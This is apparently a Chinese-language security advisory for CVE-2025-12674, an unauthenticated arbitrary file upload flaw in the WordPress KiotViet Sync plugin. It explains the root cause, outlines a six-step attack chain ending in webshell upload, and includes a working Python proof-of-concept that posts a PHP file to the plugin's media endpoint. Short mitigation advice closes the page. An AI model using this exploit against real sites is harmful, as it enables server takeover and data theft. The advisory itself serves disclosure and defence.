CVE-2025-12674 WordPress KiotViet Sync插件任意文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-12674

漏洞类型

任意文件上传

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

KiotViet Sync插件 for WordPress

漏洞概述

CVE-2025-12674是WordPress KiotViet Sync插件中的一个严重安全漏洞。该插件用于同步WordPress与KiotViet零售系统数据。漏洞存在于create_media()函数中，由于该函数缺少对上传文件的类型验证，导致未经身份验证的远程攻击者可以向服务器上传任意文件。此漏洞的CVSS评分为9.8，属于严重级别，对受影响系统构成极高风险。攻击者成功利用此漏洞后，可以在服务器上执行任意代码，从而完全控制受影响的WordPress网站，窃取敏感数据、安装后门或进行进一步的网络渗透攻击。由于该漏洞无需认证即可利用，且可导致远程代码执行，因此被标记为最高优先级安全事件。WordPress网站管理员应立即采取行动，应用官方发布的安全更新。

技术细节

该漏洞的根本原因在于KiotViet Sync插件的create_media()函数缺乏适当的文件类型验证机制。在正常情况下，文件上传功能应该对上传文件的MIME类型、扩展名和内容进行严格检查，确保只允许上传预定义的安全文件类型（如图片、文档等）。然而，由于create_media()函数直接处理用户上传的文件流而未进行充分验证，攻击者可以构造恶意的文件上传请求，上传包含恶意代码的文件（如PHP脚本文件）。由于WordPress插件通常具有执行PHP代码的能力，上传的恶意PHP文件可以在服务器上执行，从而实现远程代码执行。攻击者通常会上传webshell或其他恶意脚本，建立持久化访问通道。漏洞影响插件1.8.5及之前所有版本，攻击者可以利用此漏洞绕过认证机制，直接获取服务器控制权。

攻击链分析

STEP 1

1

侦察阶段：攻击者扫描互联网上的WordPress网站，识别安装有KiotViet Sync插件的站点

STEP 2

2

构造恶意文件：攻击者准备包含恶意PHP代码的文件（如webshell），用于在服务器上执行任意命令

STEP 3

3

发送上传请求：攻击者向目标网站的wp-json/kiotviet/v1/media端点发送特制的文件上传请求，无需任何认证

STEP 4

4

绕过验证：由于create_media()函数缺少文件类型验证，恶意PHP文件被成功上传到服务器

STEP 5

5

代码执行：攻击者通过HTTP请求访问上传的恶意文件，触发PHP代码执行，获得服务器命令执行能力

STEP 6

6

持久化控制：攻击者可能安装后门、窃取数据库凭证、修改网站内容或横向移动到其他系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-12674 PoC - Arbitrary File Upload in KiotViet Sync Plugin
# Target: WordPress site with KiotViet Sync plugin <= 1.8.5

def exploit(target_url, file_path):
    """
    Exploit arbitrary file upload vulnerability in KiotViet Sync plugin
    Args:
        target_url: Base URL of the WordPress site
        file_path: Path to the malicious file to upload
    """
    
    # Read malicious PHP file
    with open(file_path, 'rb') as f:
        file_content = f.read()
    
    # Construct the vulnerable endpoint
    endpoint = f"{target_url.rstrip('/')}/wp-json/kiotviet/v1/media"
    
    # Prepare multipart form data
    files = {
        'file': ('malicious.php', file_content, 'application/x-php')
    }
    
    # Send malicious upload request (unauthenticated)
    try:
        response = requests.post(endpoint, files=files, timeout=10)
        
        if response.status_code == 200:
            result = response.json()
            uploaded_url = result.get('url', '')
            print(f"[+] File uploaded successfully!")
            print(f"[+] Uploaded URL: {uploaded_url}")
            print(f"[+] Access the file to execute code: {uploaded_url}")
            return uploaded_url
        else:
            print(f"[-] Upload failed. Status code: {response.status_code}")
            print(f"[-] Response: {response.text}")
            return None
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <malicious_file>")
        print(f"Example: python {sys.argv[0]} http://victim.com /tmp/shell.php")
        sys.exit(1)
    
    target = sys.argv[1]
    malicious_file = sys.argv[2]
    exploit(target, malicious_file)

影响范围

KiotViet Sync插件 <= 1.8.5

防御指南

临时缓解措施

在官方安全更新发布之前，建议立即禁用KiotViet Sync插件或将其替换为其他安全的替代方案。同时，应配置Web应用防火墙规则，监控和阻止针对该插件API端点的异常请求。对于必须使用该插件的场景，应限制其访问权限，并在Web服务器层面禁止上传目录中的PHP文件执行。